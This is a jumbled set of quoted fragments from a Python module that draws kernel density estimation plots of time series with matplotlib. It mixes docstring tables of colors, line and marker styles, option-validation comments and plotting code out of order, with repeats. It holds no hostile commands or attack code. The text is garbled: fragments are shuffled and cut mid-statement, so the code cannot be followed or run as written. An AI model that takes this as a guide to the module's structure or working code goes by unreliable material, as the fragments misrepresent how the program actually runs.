lognorm_xaxis=False, lognorm_yaxis=False,", "lognorm_xaxis, lognorm_yaxis, weibull_xaxis, and weibull_yaxis. {columns} {start_date} {end_date} {clean} {skiprows}", "[\"no-latex\"] style_loc = os.path.join( os.path.dirname(__file__), os.pardir, \"SciencePlots_styles\" ) plot_styles =", "\"lognorm_xaxis\", \"weibull_xaxis\"]: vlines_x = ppf(tsutils.make_list(vlines_x)) plt.vlines( vlines_x, vlines_ymin, vlines_ymax, colors=vlines_colors,", "default to False] In case subplots=True, share y axis. colors", "the chart size to fit in a column of the", "invert_xaxis=invert_xaxis, invert_yaxis=invert_yaxis, round_index=round_index, plotting_position=plotting_position, prob_plot_sort_values=prob_plot_sort_values, source_units=source_units, target_units=target_units, lag_plot_lag=lag_plot_lag, plot_styles=plot_styles, hlines_y=hlines_y,", "1 | tri_down | +-------+----------------+ | 2 | tri_up |", "and `ofilename` is None will return the Matplotlib figure that", "'kde' for Kernel Density Estimation or 'hist' for a histogram.", "create a PNG file. If used within Python, and `ofilename`", "None) type = \"kde\" import matplotlib matplotlib.use(\"Agg\") import matplotlib.pyplot as", ") plot_styles = [ os.path.join(style_loc, i + \".mplstyle\") if os.path.exists(os.path.join(style_loc,", "\".mplstyle\")) else i for i in plot_styles ] plt.style.use(plot_styles) figsize", "dotted | +---------+--------------+ | None | draw nothing | +---------+--------------+", "must supply a comma separated list of strings for each", "not None: vlines_x = tsutils.make_list(vlines_x) vlines_ymin = tsutils.make_list(vlines_ymin) vlines_ymax =", "For --lognorm_yaxis use --type=\"lognorm_yaxis\" * \"\"\" ) if xaxis ==", "_, ax = plt.subplots(figsize=figsize) if type in [\"kde\", \"probability_density\"]: ax", "logx=False, logy=False, xaxis=\"arithmetic\", yaxis=\"arithmetic\", xlim=None, ylim=None, secondary_y=False, mark_right=True, scatter_matrix_diagonal=\"kde\", bootstrap_size=50,", "\"seaborn-pastel\", \"seaborn-poster\", \"seaborn-talk\", \"seaborn-ticks\", \"seaborn-white\", \"seaborn-whitegrid\", \"tableau-colorblind10\", and SciencePlots styles", "list, or a list of strings if using the Python", "freq string (day) OR (2 day) short_freq = \"({})\".format(pltfreq[beginstr:-1]) except", "y-axis of the plot. See `xlim` for examples. xaxis :", "| * | stars | +-----------------+-------------------+ logx DEPRECATED: use '--xaxis=\"log\"'", "to as needed. lag_plot_lag [optional, default to 1] The lag", "the available matplotlib line types. Otherwise on the command line", "to 500] The number of random subsets of 'bootstrap_size'. norm_xaxis", "plot style. hlines_linestyles: [optional, defaults to None] List of linestyles", "added to as needed. lag_plot_lag [optional, default to 1] The", "\"hist\"]], 1], # bootstrap_size=[int, [\"range\", [0, None]], 1], # xy_match_line=[str,", "{skiprows} {index_type} {names} {source_units} {target_units} {round_index} plot_styles: str [optional, default", "the standard linestyles list. vlines_x: [optional, defaults to None] List", "hlines_y: [optional, defaults to None] Number or list of y", "], # ], # None, # ], # hlines_y=[float, [\"pass\",", "| : | dotted | +---------+--------------+ | None | draw", "a list must be same length as `vlines_x`. If a", "Styles The \"ieee\" style is appropriate for black, white, and", "| draw nothing | +---------+--------------+ | ' ' | draw", "type = \"kde\" import matplotlib matplotlib.use(\"Agg\") import matplotlib.pyplot as plt", "| dash_dot | +---------+--------------+ | : | dotted | +---------+--------------+", "# ofilename=[str, [\"pass\", []], 1], # type=[str, [\"domain\", [\"kde\",],], 1,],", "True or logy is True or norm_xaxis is True or", "order, for example 'r*--' is a red dashed line with", "list must be same length as `hlines_y`. If a single", "[]], None], # vlines_colors=[str, [\"pass\", []], None], # vlines_linestyles=[ #", "nylim[1] if type in [ \"time\", \"xy\", \"bar\", \"bar_stacked\", \"histogram\",", "or added to as needed. lag_plot_lag [optional, default to 1]", "default 'auto' will cycle through matplotlib colors in the chosen", "gray, where 0 is white an 1 is black. 4.", "of the previous. Color Blind Appropriate Styles The styles \"seaborn-colorblind\",", "through the available matplotlib hatch types. Otherwise on the command", "for style which has {} style strings, but you have", "strings if using the Python API. To not display lines", "| ...etc. | +------------------+ Color reference: http://matplotlib.org/api/colors_api.html linestyles [optional, default", "able to be distinguished by someone with color blindness. Black,", "of strings for each time-series in the data set. subplots", "| O | large circle | +-----------------+-------------------+ | . |", "[]], None], # vlines_linestyles=[ # str, # [\"domain\", [\"auto\", None,", "'markerstyles' instead of using the 'style' keyword. +-------+----------------+ | Code", "only used if type equal to \"bar\", \"barh\", \"bar_stacked\", and", "'steps-post'] por [optional] Plot from first good value to last", "\"1\": beginstr = 3 else: beginstr = 1 if pltfreq", "instead. lognorm_yaxis DEPRECATED: use '--type=\"lognorm_yaxis\"' instead. xy_match_line : str [optional,", "at the minimum x value for the entire plot. hlines_xmax:", "label_skip=label_skip, force_freq=force_freq, drawstyle=drawstyle, por=por, invert_xaxis=invert_xaxis, invert_yaxis=invert_yaxis, round_index=round_index, plotting_position=plotting_position, prob_plot_sort_values=prob_plot_sort_values, source_units=source_units,", "and barh_stacked. ibar_hatchstyles = itertools.cycle(bar_hatchstyles) if ( logx is True", "\"weibull_yaxis\", ]: if hlines_y is not None: if type in", "keyword. +-------+----------------+ | Code | Markers | +=======+================+ | .", "needed. lag_plot_lag [optional, default to 1] The lag used if", "defaults to None] Number or list of y values where", "plot_styles: str [optional, default is \"default\"] Set the style of", "and 'markerstyles' instead of using the 'style' keyword. +---------+--------------+ |", "value for the entire plot. hlines_xmax: [optional, defaults to None]", "Need to work around some old option defaults with the", "None, \"\", \" \", \" \"] + plotutils.HATCH_LIST], None], #", "Will add a match line where x == y. Set", "| +-----------------+-------------------+ | - | horizontal | +-----------------+-------------------+ | +", "index_type=index_type, names=names, ofilename=ofilename, xtitle=xtitle, ytitle=ytitle, title=title, figsize=figsize, legend=legend, legend_names=legend_names, subplots=subplots,", "\"bar_stacked\", \"histogram\", \"norm_xaxis\", \"lognorm_xaxis\", \"weibull_xaxis\", \"norm_yaxis\", \"lognorm_yaxis\", \"weibull_yaxis\", ]: if", "Separated 'colors', 'linestyles', and 'markerstyles' instead of using the 'style'", "defaults to None] Legend would normally use the time-series names", "If 'auto' will iterate through the available matplotlib marker types.", "use a space (' ') as the linestyle code. Separated", "'markerstyles' instead of using the 'style' keyword. +---------+--------------+ | Code", "= plotutils.know_your_limits(ylim, axis=yaxis) plot_styles = tsutils.make_list(plot_styles) + [\"no-latex\"] style_loc =", "False]], 1], # sharex=[bool, [\"domain\", [True, False]], 1], # sharey=[bool,", "would base the lower limit on the data and set", "hlines_xmin, hlines_xmax, colors=hlines_colors, linestyles=hlines_linestyles, ) if vlines_x is not None:", "density estimation (KDE). {ydata} Parameters ---------- {input_ts} ofilename : str", "For --norm_yaxis use --type=\"norm_yaxis\" * For --lognorm_xaxis use --type=\"lognorm_xaxis\" *", "vertical lines. If a list must be same length as", "legend is True: plt.legend(loc=\"best\") if hlines_y is not None: hlines_y", "r\"\"\"Kernel density estimation of probability density function. \"kde\" will create", "\"muted\", and \"retro\". If multiple styles then each over rides", "HTML Color Names | +==================+ | red | +------------------+ |", "values] Comma separated lower and upper limits for the y-axis", "matplotlib matplotlib.use(\"Agg\") import matplotlib.pyplot as plt from matplotlib.ticker import FixedLocator", "= plt.subplots(figsize=figsize) if type in [\"kde\", \"probability_density\"]: ax = tsd.plot.kde(", "small circle | +-----------------+-------------------+ | O | large circle |", "[optional, default is False] Whether to plot on the secondary", "# colors=[str, [\"pass\", []], None], # linestyles=[str, [\"domain\", [\"auto\", None,", "linestyles] markerstyles = [\" \" if i is None else", "None | nothing | +-------+----------------+ | ' ' | nothing", "len(nstyle), len(tsd.columns) ) ) ) colors = [] markerstyles =", "style=style, logx=logx, logy=logy, xaxis=xaxis, yaxis=yaxis, xlim=xlim, ylim=ylim, secondary_y=secondary_y, mark_right=mark_right, scatter_matrix_diagonal=scatter_matrix_diagonal,", "The \"grayscale\" is another style useful for photo-copyable black, white,", "label_skip=[int, [\"range\", [1, None]], 1], # drawstyle=[str, [\"pass\", []], 1],", "1], # subplots=[bool, [\"domain\", [True, False]], 1], # sharex=[bool, [\"domain\",", "if vlines_ymax is None: vlines_ymax = nylim[1] if type in", "bootstrap_size : int [optional, defaults to 50] The size of", "None, \"\", \" \", \" \"] + plotutils.LINE_LIST], # None,", "| hexagon1 | +-------+----------------+ | H | hexagon2 | +-------+----------------+", "| +---------+--------------+ | -. | dash_dot | +---------+--------------+ | :", "start_date=None, end_date=None, clean=False, skiprows=None, index_type=\"datetime\", names=None, ofilename=\"plot.png\", xtitle=\"\", ytitle=\"\", title=\"\",", ": str [optional, default depends on ``type``] Title of x-axis.", "nd gray. Matplotlib styles: https://matplotlib.org/3.3.1/gallery/style_sheets/style_sheets_reference.html SciencePlots styles: https://github.com/garrettj403/SciencePlots hlines_y: [optional,", "1: markerstyles.append(\" \") linestyles.append(\"-\") continue if st[1] in plotutils.MARKER_LIST: markerstyles.append(st[1])", "* For --logy use --yaxis=\"log\" * For --norm_xaxis use --type=\"norm_xaxis\"", "if yaxis == \"log\": logy = True xlim = plotutils.know_your_limits(xlim,", "of style strings as time-series to plot. You supplied '{}'", "xlim=xlim, ylim=ylim, secondary_y=secondary_y, figsize=figsize, ) for index, line in enumerate(ax.lines):", "the minimum x values for all horizontal lines. A missing", "int [optional] Rotation for major labels for bar plots. label_skip", "print_function import itertools import os import warnings import mando import", "separated list, or a list of strings if using the", "bar_hatchstyles=bar_hatchstyles, style=style, logx=logx, logy=logy, xaxis=xaxis, yaxis=yaxis, xlim=xlim, ylim=ylim, secondary_y=secondary_y, mark_right=mark_right,", "will cycle through matplotlib colors in the chosen style. At", "time series.\"\"\" from __future__ import absolute_import, division, print_function import itertools", "an 1 is black. 4. Any of the HTML color", "the plot. Extension defines the type, for example 'filename.png' will", "[optional, defaults to '10,6.5'] The 'width,height' of plot in inches.", "of minimum x values to start the horizontal line. If", "| star | +-------+----------------+ | h | hexagon1 | +-------+----------------+", "entire plot. hlines_xmax: [optional, defaults to None] List of maximum", "for examples. xaxis : str [optional, default is 'arithmetic'] Defines", "entire plot. vlines_ymax: [optional, defaults to None] List of maximum", "| _ | hlines_y | +-------+----------------+ | None | nothing", "is based on range of x values] Comma separated lower", "type in [ \"time\", \"xy\", \"bar\", \"bar_stacked\", \"histogram\", \"norm_xaxis\", \"lognorm_xaxis\",", "legend=None, legend_names=None, subplots=False, sharex=True, sharey=False, colors=\"auto\", linestyles=\"auto\", markerstyles=\" \", bar_hatchstyles=\"auto\",", "magenta | +------+---------+ | y | yellow | +------+---------+ |", "False] Whether to plot grid lines on the major ticks.", "if vlines_x is not None: if type in [\"norm_xaxis\", \"lognorm_xaxis\",", "int [optional] Skip for major labels for bar plots. drawstyle", "x values to end each vertical line. If a list", "on ``type``] Title of y-axis. title : str [optional, defaults", "| +-------+----------------+ | ``+`` | plus | +-------+----------------+ | x", "\"weibull_yaxis\"]: hlines_y = ppf(tsutils.make_list(hlines_y)) plt.hlines( hlines_y, hlines_xmin, hlines_xmax, colors=hlines_colors, linestyles=hlines_linestyles,", "with the input data. The 'legend_names' option allows you to", "if legend is True: plt.legend(loc=\"best\") if hlines_y is not None:", "| v | triangle down | +-------+----------------+ | ^ |", "= ax.get_ylim() if vlines_ymin is None: vlines_ymin = nylim[0] if", "of strings if using the Python API. To not display", "legend = bool(legend == \"\" or legend == \"True\" or", "for the y-axis of the plot. See `xlim` for examples.", "circle | +-----------------+-------------------+ | O | large circle | +-----------------+-------------------+", "a single number will be the maximum x value for", "in 'ColorMarkerLine' order, for example 'r*--' is a red dashed", "i + \".mplstyle\")) else i for i in plot_styles ]", "strings as time-series to plot. You supplied '{}' for style", "None: vlines_ymax = nylim[1] if type in [ \"time\", \"xy\",", "[\"auto\", None, \"\", \" \", \" \"] + plotutils.LINE_LIST], None],", "specifies the plot along the diagonal. One of 'kde' for", "limits for the x-axis of the plot. For example, '--xlim", "\"tableau-colorblind10\", \"bright\", \"vibrant\", and \"muted\" are all styles that are", "= next(ilinestyles) else: l = None if c is not", "sort the values for the probability plots. Only used for", "colors is not None: icolors = itertools.cycle(colors) else: icolors =", "True] Whether to display the legend. legend_names : str [optional,", "itertools.cycle(bar_hatchstyles) if ( logx is True or logy is True", "| +-------+----------------+ | d | thin diamond | +-------+----------------+ |", "lognorm_xaxis=False, lognorm_yaxis=False, xy_match_line=\"\", grid=False, label_rotation=None, label_skip=1, force_freq=None, drawstyle=\"default\", por=False, invert_xaxis=False,", "invert_xaxis=[bool, [\"domain\", [True, False]], 1], # invert_yaxis=[bool, [\"domain\", [True, False]],", "title=[str, [\"pass\", []], 1], # figsize=[float, [\"range\", [0, None]], 2],", "plt.hlines( hlines_y, hlines_xmin, hlines_xmax, colors=hlines_colors, linestyles=hlines_linestyles, ) if vlines_x is", "the plot. For example, '--xlim 1,1000' would limit the plot", "subplots for each time series. sharex [optional, default to True]", "None]], 2], # legend=[bool, [\"domain\", [True, False]], 1], # legend_names=[str,", "\"\" else: # short freq string (day) OR (2 day)", "maintained for backward-compatibility. ACCEPTS:: ['default' | 'steps' | 'steps-pre' |", "Whether to plot grid lines on the major ticks. label_rotation", "for the entire plot. hlines_colors: [optional, defaults to None] List", "* * For --logx use --xaxis=\"log\" * For --logy use", "journal. The \"grayscale\" is another style useful for photo-copyable black,", "logy = True xlim = plotutils.know_your_limits(xlim, axis=xaxis) ylim = plotutils.know_your_limits(ylim,", "[\"auto\", None, \"\", \" \", \" \"] + plotutils.MARKER_LIST], None],", "\" \" if style != \"auto\": nstyle = tsutils.make_list(style) if", "identify colors in four different ways. 1. Use 'CN' where", "\" \"] + plotutils.HATCH_LIST], None], # style=[str, [\"pass\", []], None],", "dashed line with star marker. bar_hatchstyles [optional, default to \"auto\",", "colors=colors, linestyles=linestyles, markerstyles=markerstyles, bar_hatchstyles=bar_hatchstyles, style=style, logx=logx, logy=logy, xaxis=xaxis, yaxis=yaxis, xlim=xlim,", "density function based on the data called kernel density estimation", "1], # title=[str, [\"pass\", []], 1], # figsize=[float, [\"range\", [0,", "* \"\"\" ) if xaxis == \"log\": logx = True", "[\"pass\", []], None], # linestyles=[str, [\"domain\", [\"auto\", None, \"\", \"", "\"\", \" \", \" \"] + plotutils.LINE_LIST], None], # markerstyles=[str,", "instead. xlim [optional, default is based on range of x", "depends on ``type``] Title of y-axis. title : str [optional,", "defaults to None] List of linestyles for the vertical lines.", "[\"pass\", []], None], # vlines_ymin=[float, [\"pass\", []], None], # vlines_ymax=[float,", "str [optional, default depends on ``type``] Title of x-axis. ytitle", "--yaxis=\"log\" * For --norm_xaxis use --type=\"norm_xaxis\" * For --norm_yaxis use", "if linestyles is None: linestyles = [\" \"] else: linestyles", "values] Comma separated lower and upper limits for the x-axis", "bar_hatchstyles=[str, [\"domain\", [\"auto\", None, \"\", \" \", \" \"] +", "the chosen style. At the command line supply a comma", "to 'auto'] If 'auto' will iterate through the available matplotlib", "large circle | +-----------------+-------------------+ | . | dots | +-----------------+-------------------+", "default depends on ``type``] Title of y-axis. title : str", "SciencePlots styles: https://github.com/garrettj403/SciencePlots hlines_y: [optional, defaults to None] Number or", "[]], None], # hlines_colors=[str, [\"pass\", []], None], # hlines_linestyles=[ #", "Blind Appropriate Styles The styles \"seaborn-colorblind\", \"tableau-colorblind10\", \"bright\", \"vibrant\", and", "tsutils.make_list(plot_styles) + [\"no-latex\"] style_loc = os.path.join( os.path.dirname(__file__), os.pardir, \"SciencePlots_styles\" )", "If a single number will be used as the minimum", "| +=================+===================+ | / | diagonal hatching | +-----------------+-------------------+ |", "last good value. Strips NANs from beginning and end. {force_freq}", "bar, barh, bar_stacked, and barh_stacked. ibar_hatchstyles = itertools.cycle(bar_hatchstyles) if (", "== \"log\": logy = True xlim = plotutils.know_your_limits(xlim, axis=xaxis) ylim", "icolors is not None: c = next(icolors) else: c =", "maximum x value for all horizontal lines. A missing value", "for bar, barh, bar_stacked, and barh_stacked. ibar_hatchstyles = itertools.cycle(bar_hatchstyles) if", "The 'legend_names' option allows you to override the names in", "hlines_xmin = tsutils.make_list(hlines_xmin) hlines_xmax = tsutils.make_list(hlines_xmax) hlines_colors = tsutils.make_list(hlines_colors) hlines_linestyles", "or all of the characteristics of the previous. Color Blind", "''] Will add a match line where x == y.", "be same length as `hlines_y`. If None will take for", "i + \".mplstyle\") if os.path.exists(os.path.join(style_loc, i + \".mplstyle\")) else i", "\"seaborn\", \"seaborn-bright\", \"seaborn-colorblind\", \"seaborn-dark\", \"seaborn-dark-palette\", \"seaborn-darkgrid\", \"seaborn-deep\", \"seaborn-muted\", \"seaborn-notebook\", \"seaborn-paper\",", "colors=vlines_colors, linestyles=vlines_linestyles, ) plt.xlabel(xtitle) plt.ylabel(ytitle) if invert_xaxis is True: plt.gca().invert_xaxis()", "through the available matplotlib line types. Otherwise on the command", "if i in [\" \", None] else i for i", "level of gray, where 0 is white an 1 is", "the Nth color from the current style. 2. Single character", "plot. vlines_ymax: [optional, defaults to None] List of maximum x", "on the data called kernel density estimation (KDE). {ydata} Parameters", "markerstyles = tsutils.make_list(markerstyles) if markerstyles is None: markerstyles = \"", "None will start at the minimum x value for the", "length as `vlines_x`. If None will take for the standard", "= \"({})\".format(pltfreq[beginstr:-1]) except AttributeError: short_freq = \"\" if colors ==", "], # 1, # ], # prob_plot_sort_values=[str, [\"domain\", [\"ascending\", \"descending\"]],", "and \"barh_stacked\"] If 'auto' will iterate through the available matplotlib", "for norm_xaxis, norm_yaxis, lognorm_xaxis, lognorm_yaxis, weibull_xaxis, and weibull_yaxis. prob_plot_sort_values :", "l = next(ilinestyles) else: l = None if c is", "type in [\"norm_yaxis\", \"lognorm_yaxis\", \"weibull_yaxis\"]: hlines_y = ppf(tsutils.make_list(hlines_y)) plt.hlines( hlines_y,", "hlines_y is not None: if type in [\"norm_yaxis\", \"lognorm_yaxis\", \"weibull_yaxis\"]:", "is True ): warnings.warn( \"\"\" * * The --logx, --logy,", "default is 'arithmetic'] Defines the type of the yaxis. One", "= None if imarkerstyles is not None: m = next(imarkerstyles)", "default to True] In case subplots=True, share x axis. sharey", "used as the minimum x values for all horizontal lines.", "y values to start the vertical line. If a list", "Names | +==================+ | red | +------------------+ | burlywood |", "None, # ], # vlines_x=[float, [\"pass\", []], None], # vlines_ymin=[float,", "Python, and `ofilename` is None will return the Matplotlib figure", "values for the probability plots. Only used for norm_xaxis, norm_yaxis,", "minimum y values to start the vertical line. If a", "style=None, logx=logx, logy=logy, xlim=xlim, ylim=ylim, secondary_y=secondary_y, figsize=figsize, ) for index,", "or logy is True or norm_xaxis is True or norm_yaxis", "Skip for major labels for bar plots. drawstyle : str", "Color Blind Appropriate Styles The styles \"seaborn-colorblind\", \"tableau-colorblind10\", \"bright\", \"vibrant\",", "\"barh\", \"bar_stacked\", and \"barh_stacked\"] If 'auto' will iterate through the", "None]], 1], # xtitle=[str, [\"pass\", []], 1], # ytitle=[str, [\"pass\",", "plt.title(title) plt.tight_layout() if ofilename is not None: plt.savefig(ofilename) return plt", "\", \" \"] + plotutils.MARKER_LIST], None], # bar_hatchstyles=[str, [\"domain\", [\"auto\",", "will be used as the color for all horizontal lines.", "legend_names : str [optional, defaults to None] Legend would normally", "a list of strings if using the Python API. +-----------------+-------------------+", "\"seaborn-dark-palette\", \"seaborn-darkgrid\", \"seaborn-deep\", \"seaborn-muted\", \"seaborn-notebook\", \"seaborn-paper\", \"seaborn-pastel\", \"seaborn-poster\", \"seaborn-talk\", \"seaborn-ticks\",", "The size of the random subset for 'bootstrap' plot. bootstrap_samples", "option allows you to override the names in the data", "as the color for all horizontal lines. If a list", "ilinestyles is not None: l = next(ilinestyles) else: l =", "\", bar_hatchstyles=\"auto\", style=\"auto\", logx=False, logy=False, xaxis=\"arithmetic\", yaxis=\"arithmetic\", xlim=None, ylim=None, secondary_y=False,", "green | +------+---------+ | r | red | +------+---------+ |", "in four different ways. 1. Use 'CN' where N is", "| +-------+----------------+ | < | triangle left | +-------+----------------+ |", "short_freq = \"\" else: # short freq string (day) OR", "\"weibull_xaxis\", \"norm_yaxis\", \"lognorm_yaxis\", \"weibull_yaxis\", ]: if hlines_y is not None:", "= tsutils.make_list(hlines_xmax) hlines_colors = tsutils.make_list(hlines_colors) hlines_linestyles = tsutils.make_list(hlines_linestyles) nxlim =", "'style' keyword. +-------+----------------+ | Code | Markers | +=======+================+ |", "single linestyle then will be used as the linestyle for", "[0, None]], 1], # xy_match_line=[str, [\"pass\", []], 1], # grid=[bool,", "| 8 | octagon | +-------+----------------+ | s | square", "next(ilinestyles) else: l = None if c is not None:", "'bootstrap' plot. bootstrap_samples [optional, defaults to 500] The number of", "hlines_xmax=None, hlines_colors=None, hlines_linestyles=\"-\", vlines_x=None, vlines_ymin=None, vlines_ymax=None, vlines_colors=None, vlines_linestyles=\"-\", ): r\"\"\"Kernel", "\"cunnane\", \"california\"], # ], # 1, # ], # prob_plot_sort_values=[str,", "place a vertical line. vlines_ymin: [optional, defaults to None] List", "3 else: beginstr = 1 if pltfreq == \"none\": short_freq", "| +-------+----------------+ | _ | hlines_y | +-------+----------------+ | None", "+-------+----------------+ | h | hexagon1 | +-------+----------------+ | H |", "= \"\" else: # short freq string (day) OR (2", "DEPRECATED: use '--yaxis=\"log\"' instead. xlim [optional, default is based on", "hlines_xmax: [optional, defaults to None] List of maximum x values", "is not None: if type in [\"norm_yaxis\", \"lognorm_yaxis\", \"weibull_yaxis\"]: hlines_y", "Strips NANs from beginning and end. {force_freq} invert_xaxis [optional, default", "| +-------+----------------+ | > | triangle right | +-------+----------------+ |", "| / | diagonal hatching | +-----------------+-------------------+ | ``\\`` |", "defaults to True] Whether to display the legend. legend_names :", "time series. sharex [optional, default to True] In case subplots=True,", "| p | pentagon | +-------+----------------+ | ``*`` | star", "\"seaborn-poster\", # \"seaborn-talk\", # \"seaborn-ticks\", # \"seaborn-white\", # \"seaborn-whitegrid\", #", "type in [\"kde\", \"probability_density\"]: ax = tsd.plot.kde( legend=legend, subplots=subplots, sharex=sharex,", "None] List of colors for the vertical lines. If a", "size to fit in a column of the \"IEEE\" journal.", "None], # xlim=[float, [\"pass\", []], 2], # ylim=[float, [\"pass\", []],", "# ], # ) def kde( input_ts=\"-\", columns=None, start_date=None, end_date=None,", "tsd, lnames = plotutils.check(type, tsd, legend_names) # This is to", "try: try: pltfreq = str(tsd.index.freq, \"utf-8\").lower() except TypeError: pltfreq =", "[\"domain\", [True, False]], 1], # label_rotation=[float, [\"pass\", []], 1], #", "plotutils.MARKER_LIST else: markerstyles = tsutils.make_list(markerstyles) if markerstyles is None: markerstyles", "circle | +-----------------+-------------------+ | . | dots | +-----------------+-------------------+ |", "o | small circle | +-----------------+-------------------+ | O | large", "weibull_xaxis, and weibull_yaxis. prob_plot_sort_values : str [optional, default is 'descending']", "a histogram. bootstrap_size : int [optional, defaults to 50] The", "# str, # [ # \"domain\", # [\"weibull\", \"benard\", \"tukey\",", "take for the standard linestyles list. vlines_x: [optional, defaults to", "[\"domain\", [\"auto\", None, \"\", \" \", \" \"] + plotutils.MARKER_LIST],", "str [optional, defaults to '10,6.5'] The 'width,height' of plot in", "instead of using the 'style' keyword. +---------+--------------+ | Code |", "== \"1\": beginstr = 3 else: beginstr = 1 if", "the 'style' keyword. +-------+----------------+ | Code | Markers | +=======+================+", "\" \", \" \"] + plotutils.LINE_LIST], None], # markerstyles=[str, [\"domain\",", "str(tsd.index.freq, \"utf-8\").lower() except TypeError: pltfreq = str(tsd.index.freq).lower() if pltfreq.split(\" \")[0][1:]", "\") linestyles.append(st[1:]) if linestyles is None: linestyles = [\" \"]", "\"seaborn-white\", # \"seaborn-whitegrid\", # \"tableau-colorblind10\", # \"science\", # \"grid\", #", "value for all horizontal lines. A missing value or None", "None: l = next(ilinestyles) else: l = None if c", "diagonal. One of 'kde' for Kernel Density Estimation or 'hist'", "missing value or None will start at the minimum x", "None], # vlines_ymax=[float, [\"pass\", []], None], # vlines_colors=[str, [\"pass\", []],", "legend [optional, defaults to True] Whether to display the legend.", "instead. xy_match_line : str [optional, defaults is ''] Will add", "the style of the plot. One or more of Matplotlib", ": str [optional, default is 'arithmetic'] Defines the type of", "is None: vlines_ymax = nylim[1] if type in [ \"time\",", "data. The 'legend_names' option allows you to override the names", "plot_styles = tsutils.make_list(plot_styles) + [\"no-latex\"] style_loc = os.path.join( os.path.dirname(__file__), os.pardir,", "# scatter_matrix_diagonal=[str, [\"domain\", [\"kde\", \"hist\"]], 1], # bootstrap_size=[int, [\"range\", [0,", "for i in linestyles] markerstyles = [\" \" if i", "'default' connects the points with lines. The steps variants produce", "| black | +------+---------+ 3. Number between 0 and 1", "import RSTHelpFormatter from tstoolbox import tsutils from .. import plotutils", "xlim [optional, default is based on range of x values]", "number will be the maximum x value for all vertical", "reference: http://matplotlib.org/api/markers_api.html style [optional, default is None] Still available, but", "hexagon2 | +-------+----------------+ | ``+`` | plus | +-------+----------------+ |", "| stars | +-----------------+-------------------+ logx DEPRECATED: use '--xaxis=\"log\"' instead. logy", "is appropriate for black, white, and gray, however the \"ieee\"", "os import warnings import mando import numpy as np import", "'arithmetic', 'log'. secondary_y [optional, default is False] Whether to plot", "vlines_ymin: [optional, defaults to None] List of minimum y values", "vlines_linestyles: [optional, defaults to None] List of linestyles for the", "import mando import numpy as np import pandas as pd", "table below. +------+---------+ | Code | Color | +======+=========+ |", "\"fast\", # \"fivethirtyeight\", # \"ggplot\", # \"grayscale\", # \"seaborn\", #", "tsutils.make_list(vlines_ymin) vlines_ymax = tsutils.make_list(vlines_ymax) vlines_colors = tsutils.make_list(vlines_colors) vlines_linestyles = tsutils.make_list(vlines_linestyles)", "colors in four different ways. 1. Use 'CN' where N", "HTML color names. +------------------+ | HTML Color Names | +==================+", "title=title, figsize=figsize, legend=legend, legend_names=legend_names, subplots=subplots, sharex=sharex, sharey=sharey, colors=colors, linestyles=linestyles, markerstyles=markerstyles,", "star marker. bar_hatchstyles [optional, default to \"auto\", only used if", "hlines_y = ppf(tsutils.make_list(hlines_y)) plt.hlines( hlines_y, hlines_xmin, hlines_xmax, colors=hlines_colors, linestyles=hlines_linestyles, )", "API. Separated 'colors', 'linestyles', and 'markerstyles' instead of using the", "| +=========+==============+ | ``-`` | solid | +---------+--------------+ | --", "# invert_xaxis=[bool, [\"domain\", [True, False]], 1], # invert_yaxis=[bool, [\"domain\", [True,", "use '--type=\"norm_yaxis\"' instead. lognorm_xaxis DEPRECATED: use '--type=\"lognorm_xaxis\"' instead. lognorm_yaxis DEPRECATED:", "must be same length as `vlines_x`. If None will take", "None: hlines_xmin = nxlim[0] if hlines_xmax is None: hlines_xmax =", "None: hlines_xmax = nxlim[1] if vlines_x is not None: vlines_x", "continue if st[1] in plotutils.MARKER_LIST: markerstyles.append(st[1]) try: linestyles.append(st[2:]) except IndexError:", "| diagonal hatching | +-----------------+-------------------+ | ``\\`` | back diagonal", "# short freq string (day) OR (2 day) short_freq =", "or norm_yaxis is True or lognorm_xaxis is True or lognorm_yaxis", "[optional, default to 1] The lag used if ``type`` \"lag_plot\"", "place a horizontal line. hlines_xmin: [optional, defaults to None] List", "hlines_y is not None: hlines_y = tsutils.make_list(hlines_y) hlines_xmin = tsutils.make_list(hlines_xmin)", "tri_up | +-------+----------------+ | 3 | tri_left | +-------+----------------+ |", "vlines_x is not None: if type in [\"norm_xaxis\", \"lognorm_xaxis\", \"weibull_xaxis\"]:", "If a list must be same length as `vlines_x`. If", "the 'style' option will override the others. Comma separated matplotlib", "end_date=end_date, pick=columns, round_index=round_index, dropna=\"all\", source_units=source_units, target_units=target_units, clean=clean, por=por, ) tsd,", "{} time-series. \"\"\".format( style, len(nstyle), len(tsd.columns) ) ) ) colors", "--norm_yaxis, --lognorm_xaxis, and * --lognorm_yaxis options are deprecated. * *", "the horizontal lines. If a single color then will be", "White, and Gray Styles The \"ieee\" style is appropriate for", "# ], # vlines_x=[float, [\"pass\", []], None], # vlines_ymin=[float, [\"pass\",", "skiprows=skiprows, index_type=index_type, names=names, ofilename=ofilename, xtitle=xtitle, ytitle=ytitle, title=title, figsize=figsize, legend=legend, legend_names=legend_names,", "plotutils.HATCH_LIST else: bar_hatchstyles = tsutils.make_list(bar_hatchstyles) if markerstyles == \"auto\": markerstyles", "{ydata} Parameters ---------- {input_ts} ofilename : str [optional, defaults to", "is 'scatter_matrix', this specifies the plot along the diagonal. One", "+==================+ | red | +------------------+ | burlywood | +------------------+ |", "each over rides some or all of the characteristics of", "base the lower limit on the data and set the", "mando.rst_text_formatter import RSTHelpFormatter from tstoolbox import tsutils from .. import", "'steps' | 'steps-pre' | 'steps-mid' | 'steps-post'] por [optional] Plot", "| tri_left | +-------+----------------+ | 4 | tri_right | +-------+----------------+", "blue | +------+---------+ | g | green | +------+---------+ |", "' | nothing | +-------+----------------+ | '' | nothing |", "by 'colors', 'linestyles', and 'markerstyles' options. Currently the 'style' option", "if hlines_y is not None: if type in [\"norm_yaxis\", \"lognorm_yaxis\",", "l = None if c is not None: plt.setp(line, color=c)", "for major labels for bar plots. label_skip : int [optional]", "1], # plotting_position=[ # str, # [ # \"domain\", #", "# None, # ], # ) def kde( input_ts=\"-\", columns=None,", "'{}' for style which has {} style strings, but you", "but if None is replaced by 'colors', 'linestyles', and 'markerstyles'", "and Gray Styles The \"ieee\" style is appropriate for black,", "vertical lines. If a single color then will be used", "vlines_colors=None, vlines_linestyles=\"-\", ): r\"\"\"Kernel density estimation of probability density function.", "# \"seaborn-ticks\", # \"seaborn-white\", # \"seaborn-whitegrid\", # \"tableau-colorblind10\", # \"science\",", "of using the 'style' keyword. +---------+--------------+ | Code | Lines", "lognorm_xaxis=lognorm_xaxis, lognorm_yaxis=lognorm_yaxis, xy_match_line=xy_match_line, grid=grid, label_rotation=label_rotation, label_skip=label_skip, force_freq=force_freq, 